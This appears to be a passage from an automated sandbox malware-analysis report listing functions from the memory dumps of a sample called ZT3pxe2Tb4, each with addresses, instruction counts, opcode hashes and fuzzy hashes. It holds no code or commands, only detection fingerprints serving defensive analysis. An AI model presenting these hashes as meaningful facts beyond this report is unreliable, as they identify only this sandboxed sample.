                                                                    • Opcode Fuzzy Hash: ee4fdc8b0d12a8d15ffe8547b4ff60c0db4c302dd41ecc65fa8b0f57f95d676a
                                                                    • Instruction Fuzzy Hash: B6319E30E0964E8BEBA4EB98C8656BD77F1FF58340F11013AD00AD32A6DE752A458B81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA10C25 Relevance: .1, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 56de89674e3c01ef534750c6e442f67eda7506ff6204d061834c24dee7cd1264
                                                                    • Instruction ID: 84828243590e11f1a57447815eb79f901f154cef3420e1d6c8622dbe91fa363b
                                                                    • Opcode Fuzzy Hash: 56de89674e3c01ef534750c6e442f67eda7506ff6204d061834c24dee7cd1264
                                                                    • Instruction Fuzzy Hash: AB314935B0E68E8BE771ABA8C8202FDB7A0EF41310F05567BC495961E2CBB82605CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FCAE5 Relevance: .1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eb3b97b17df453c82e1b38b2ad61058b7c19f9f05a891f9cd95ea1666f9e78a1
                                                                    • Instruction ID: 03d02c55007bac3bb43f2b1a406885958c6eaf1c866d8e1bf3549b2413a9bf5a
                                                                    • Opcode Fuzzy Hash: eb3b97b17df453c82e1b38b2ad61058b7c19f9f05a891f9cd95ea1666f9e78a1
                                                                    • Instruction Fuzzy Hash: 2731C434F1C54B8EEBB8DB9884665BD77B1FF44340F5001BAD40ED2681DB39A984AB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FB9D3 Relevance: .1, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3c1dc13fa2d824e250d71c0c5677256ff459e810b59182a3967b0f6bef72b073
                                                                    • Instruction ID: 9b7d7fe5532bab9886cd479aa2e7c35c1ed7accd3e2252cf97a94616591cedd5
                                                                    • Opcode Fuzzy Hash: 3c1dc13fa2d824e250d71c0c5677256ff459e810b59182a3967b0f6bef72b073
                                                                    • Instruction Fuzzy Hash: 1B214710B1C0D74AE73A875844705B47F71EF82310F1886FAD4AF8B4D7DA2CA881E780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FDA3B Relevance: .1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bd429becea75a75335114bd624fa7e11ed412c44273952590e4615d55b00f608
                                                                    • Instruction ID: 3620325a543a7af2405096f9faed548b9a926fb274cdf459f4de348edfa9ba56
                                                                    • Opcode Fuzzy Hash: bd429becea75a75335114bd624fa7e11ed412c44273952590e4615d55b00f608
                                                                    • Instruction Fuzzy Hash: D8213971F1CA4E8FDB65DF98C8605ECBBB1FF58740F0401AAD00EE3291DB24A8459B54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0F8E3A Relevance: .1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a7eebad29a58278da9329b4ade323678a0af98ad1459be2e2a64f392ab48eff3
                                                                    • Instruction ID: 7ac9b890b04204971f8d2e7c7a6b6b1e43cc7016506fe423298f1047416892c5
                                                                    • Opcode Fuzzy Hash: a7eebad29a58278da9329b4ade323678a0af98ad1459be2e2a64f392ab48eff3
                                                                    • Instruction Fuzzy Hash: 02314D71F1881B8FEB64EB88C9A29FDB7B1FF99340F500275D40E972D5DB2468819B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0F98C2 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 445d52a665e01535414558b57d29a6fbcabb2edfd5fb1581fd993c35c2215adb
                                                                    • Instruction ID: aeebdc36b2a5262736a493fbcf590cafd05e397570480fbb90c43f43194d0fb0
                                                                    • Opcode Fuzzy Hash: 445d52a665e01535414558b57d29a6fbcabb2edfd5fb1581fd993c35c2215adb
                                                                    • Instruction Fuzzy Hash: 0221E831F0891D9FDFA8DB58D4A5AECB3B1FF68310F0141AA905EE3295CB35A981CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FE592 Relevance: .1, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7fb56577910eefea1c71211ca75d89dfa4159f50d1ca2b80e2dfb12c46ebef29
                                                                    • Instruction ID: d7f2191683b8367338d132f438830af5336521da52336350fe8c2e12878bb6fa
                                                                    • Opcode Fuzzy Hash: 7fb56577910eefea1c71211ca75d89dfa4159f50d1ca2b80e2dfb12c46ebef29
                                                                    • Instruction Fuzzy Hash: 3121E730A1891D9FDFA9EB58C865AADB7B1FF5C350F0041AA901EE3291CF35A9818B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FF652 Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 02f7b0fe212aa85e1ad47616f3f4e33453bec84717c502601885120c1ffbf67c
                                                                    • Instruction ID: 3d32ec0768e0c18017b299ff996ee268039bd73b8ada6a7a9c2fc3c5b26576b2
                                                                    • Opcode Fuzzy Hash: 02f7b0fe212aa85e1ad47616f3f4e33453bec84717c502601885120c1ffbf67c
                                                                    • Instruction Fuzzy Hash: 11213031F18A1A9FDB64EB98D8619A9B3F1FF58750F144139D00ED3692CF24BC529B80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FE82B Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 563de7a2a1fe8070a0889eb3f44fc308557952e169eca46d8caebeecc0d91c05
                                                                    • Instruction ID: 0b16fc53cf382207b2a14ba92e2ca73ddb9dafd3f0915bac3caa15214fad16c3
                                                                    • Opcode Fuzzy Hash: 563de7a2a1fe8070a0889eb3f44fc308557952e169eca46d8caebeecc0d91c05
                                                                    • Instruction Fuzzy Hash: A921E530A0C68D8FCB66EB64C865AE57FB0EF4A350F0400EAD40DC71A2CA395985CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA15D41 Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4fb26d78a3dc99843a74aacc9904e150f30e6b79990f17a10a1d94abce3db16b
                                                                    • Instruction ID: 81d9cf4df27c841f9e5eca1cc625146e3351d005e9c7575b225d46228fc1a8ca
                                                                    • Opcode Fuzzy Hash: 4fb26d78a3dc99843a74aacc9904e150f30e6b79990f17a10a1d94abce3db16b
                                                                    • Instruction Fuzzy Hash: 3431B870A0491C8FCFA8DF18C854BE9B3F1EB68305F1041EAD10EE32A5DA75AA84CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FE82A Relevance: .1, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7ddfe269f575f7656f1a2fa0f2eb20a8346cf0bfd0138d93f4aa3d810007f315
                                                                    • Instruction ID: 0c1433247c0b2cfab9724a2f6bc7a9a2d128624991eb1d648e24ef1e2e9dddaa
                                                                    • Opcode Fuzzy Hash: 7ddfe269f575f7656f1a2fa0f2eb20a8346cf0bfd0138d93f4aa3d810007f315
                                                                    • Instruction Fuzzy Hash: 6921D330A0C68D8FDB56EF64C865AE87FB0EF5A340F0400EAD40DD71A2CA395985CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FF6F5 Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a717cf9a01e254af76d312236f071eb53f388c77514a1fb09f0fd62c44e75f18
                                                                    • Instruction ID: 437f01c207f8ba817e487a87782959a44d869db2f2062499c432a0460bba4624
                                                                    • Opcode Fuzzy Hash: a717cf9a01e254af76d312236f071eb53f388c77514a1fb09f0fd62c44e75f18
                                                                    • Instruction Fuzzy Hash: 4F21F632F0961A4FE769FBE894656EC77F0EF59350F14017EC04DC3293CA2858429780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA111A2 Relevance: .1, Instructions: 74COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd6954d02b94fb22c7c09529a9fac7a997f945162343891180f397d35463dfb9
                                                                    • Instruction ID: c41aa8db7f7efb21cab97fe978cd924430f6f7d705997a58cc566018bc1bd42e
                                                                    • Opcode Fuzzy Hash: fd6954d02b94fb22c7c09529a9fac7a997f945162343891180f397d35463dfb9
                                                                    • Instruction Fuzzy Hash: 2321E930A1891E8FEB94EBA8C8949BDB7F1FF28300B11057AD419D72A5EB74A941CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0F9F4F Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b2cd2973364b647ae9eaf4551f3ac6470f494e51bcfbcc06ae2ed7c868b5182d
                                                                    • Instruction ID: 1c8b6cefba88b8651ffd32ac2e5be69ef98fb9523b475d182d94a31053a11c6b
                                                                    • Opcode Fuzzy Hash: b2cd2973364b647ae9eaf4551f3ac6470f494e51bcfbcc06ae2ed7c868b5182d
                                                                    • Instruction Fuzzy Hash: 8811D231F1CA5A4FEB69AB9888326ECB7E1EF59350F15017AD00DC32C2DE2868458351
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0F95C1 Relevance: .1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ba4d8b0cc739a35097f29651efe3d0bf72bc264e8b8f9cbcba49b273908dccb1
                                                                    • Instruction ID: 9d909be9442ca70ede09d64f5f7a45b148cbbd216f02dca186c2c9660221353f
                                                                    • Opcode Fuzzy Hash: ba4d8b0cc739a35097f29651efe3d0bf72bc264e8b8f9cbcba49b273908dccb1
                                                                    • Instruction Fuzzy Hash: B7112912F4D1938BF63A56E458314BD26745F45BE0F5801BBD84E831C6CE0D28C533D2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FAA80 Relevance: .1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 554f778c2bb88fd795df2a755d97b33994b0d4c881e4e35632183364ed263425
                                                                    • Instruction ID: 46ff11c0fc6e99104c4b7de3c4f6de3cd0d637bb1ea1942e75dcc162220fe5a3
                                                                    • Opcode Fuzzy Hash: 554f778c2bb88fd795df2a755d97b33994b0d4c881e4e35632183364ed263425
                                                                    • Instruction Fuzzy Hash: A2110131B08A0B4EEB65BB6594218FA73E1FF64290F00063AD44EC34D2CF28A98586A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA10C38 Relevance: .1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe3273d7ce31964785365775f29d013e88860348a7c90cffe478514280b44232
                                                                    • Instruction ID: 90f1679d6b0bfe86697979774236c4c115f6a87b65115da74984c9c7f49e026b
                                                                    • Opcode Fuzzy Hash: fe3273d7ce31964785365775f29d013e88860348a7c90cffe478514280b44232
                                                                    • Instruction Fuzzy Hash: 8A112C35B0E59E8AF722AB68C8212EE7760EF41710F054677C495971E1DE782205CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FA8FE Relevance: .1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7339807d8d92e58a8dae6fcccdc641225749cde2ea357c3d133c8d31f0c184ad
                                                                    • Instruction ID: 7aea98c351160a59d98e8ad4023b8b6f508fa100ec059696a90209f6fc4696cd
                                                                    • Opcode Fuzzy Hash: 7339807d8d92e58a8dae6fcccdc641225749cde2ea357c3d133c8d31f0c184ad
                                                                    • Instruction Fuzzy Hash: 3211893174C50B8FE716AB58D4216EA33E1FF653A5F04413BD80DC76D2CB34A9908790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FF539 Relevance: .1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bceef4f545e7614ae27b3e83fa9c1f30ed5e3440343ee6d84cea1e6e8bdb4b9f
                                                                    • Instruction ID: 5f372552c40296870cb4f12b402c1abd48bdaf5082d4fea6f2a2cff5a00a4bf1
                                                                    • Opcode Fuzzy Hash: bceef4f545e7614ae27b3e83fa9c1f30ed5e3440343ee6d84cea1e6e8bdb4b9f
                                                                    • Instruction Fuzzy Hash: 0C112632B0DB8F1FE376DAA888286EA3BF1DB5A390F040177D00CD7191DE685D859391
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0F3DB8 Relevance: .1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c7ba0e6c6b6be4d07e9ff458e7bcf5d19cae42bcb4a90b15d899ed252d26d78f
                                                                    • Instruction ID: d8577661df2d65b6d0c9e8b87da0ee9f5bf3a94da47af6169b3d243bb8529202
                                                                    • Opcode Fuzzy Hash: c7ba0e6c6b6be4d07e9ff458e7bcf5d19cae42bcb4a90b15d899ed252d26d78f
                                                                    • Instruction Fuzzy Hash: EE01F531F08A4B5BF771A6A844686BD3AF1DF5A380F140236D00EE72D1DF646C869391
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA10C40 Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c9981180a2d3f93fc2f0c65ca9ce1c1b8886c9ecc7aab2bb50089888dc250d7
                                                                    • Instruction ID: 744442af3a1a31f3c44cd5ebe9e3665348088bc673d49e99782f726e61eef2b8
                                                                    • Opcode Fuzzy Hash: 2c9981180a2d3f93fc2f0c65ca9ce1c1b8886c9ecc7aab2bb50089888dc250d7
                                                                    • Instruction Fuzzy Hash: F9112B35B0E69E8AF722EB68C8202EEB760EF41710F054677D495972E2CF782205CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA10B7F Relevance: .1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8382a891bef062302726523f0da69a943d9c624954b12456548022e4e70dd361
                                                                    • Instruction ID: 42f091800a0faa2d3409ca5ed16812e8bc5f1bcb4f696a303a29688eb0e8c63f
                                                                    • Opcode Fuzzy Hash: 8382a891bef062302726523f0da69a943d9c624954b12456548022e4e70dd361
                                                                    • Instruction Fuzzy Hash: 69117971A2864E8FCB44EF28C891AEA77E0FF18318F0502AAF84DD3251DB30A514CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0F9542 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6d3c4f1b905f37b30841b10e413cabbb23249996b3d6f8ff410101477e98fd57
                                                                    • Instruction ID: e7dd3589a272d683b4e37e8a2c3b604bdc1538e7ece439328370e217206d53cc
                                                                    • Opcode Fuzzy Hash: 6d3c4f1b905f37b30841b10e413cabbb23249996b3d6f8ff410101477e98fd57
                                                                    • Instruction Fuzzy Hash: 2E11AF70B1881EDEDBA8DB98D8A09ACB7B1FF58744F500569D00EE3291CB3468419B50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA12303 Relevance: .0, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 314f1ac0b346bfa732352059bb14de0d694f24d789853697903efdb36887edf3
                                                                    • Instruction ID: 0adf48e9ffd5128040f7bc530ff3b2e7b4f80ded3e2c9bf6784d590044120075
                                                                    • Opcode Fuzzy Hash: 314f1ac0b346bfa732352059bb14de0d694f24d789853697903efdb36887edf3
                                                                    • Instruction Fuzzy Hash: E821B870A0A62D8EEBB4EF54C859BA9B3B1EB54301F1052E9D50DA22A1DFB45B84CF44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA10845 Relevance: .0, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 218bf0383b43d066c761a0301715bdec96fcb0933e088f97c212dc6bb1b90948
                                                                    • Instruction ID: e0d619006dd4bc0ad8c8fd9cf9143ef262b3ec8b8cd8c741db804b034fe65c2a
                                                                    • Opcode Fuzzy Hash: 218bf0383b43d066c761a0301715bdec96fcb0933e088f97c212dc6bb1b90948
                                                                    • Instruction Fuzzy Hash: A5014B30A0894D9FDF84EF58D895AEE7BE0FF28304F010066F859C31A1DA34E6A0CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0F75CD Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6d00c891a021faaf8464218f08861a07b14753d360a6853a54f7b634715219d
                                                                    • Instruction ID: 083a89b4aca87c7d063f3c759116037916e0549ebd7211f70915ab3a7c30ea7a
                                                                    • Opcode Fuzzy Hash: e6d00c891a021faaf8464218f08861a07b14753d360a6853a54f7b634715219d
                                                                    • Instruction Fuzzy Hash: 75F0D611B0CA874BEB799BBC80794BC7BB0AF15390F4505BBC04EC25D3EB18AC80A742
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA1670C Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6b23d0b7472d5a0fa607cac45a1a52d6a57917127b8f56d4761dc65951f0c700
                                                                    • Instruction ID: 9fcdf787d1e84909e99e2a1642cd94398660cda5856b7dea94f46590759cff63
                                                                    • Opcode Fuzzy Hash: 6b23d0b7472d5a0fa607cac45a1a52d6a57917127b8f56d4761dc65951f0c700
                                                                    • Instruction Fuzzy Hash: 7D012930A0555E8EEBB4EB18C8987F9B3B1EF54302F1082F6D41DA2299DA741E81CF44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA106A5 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
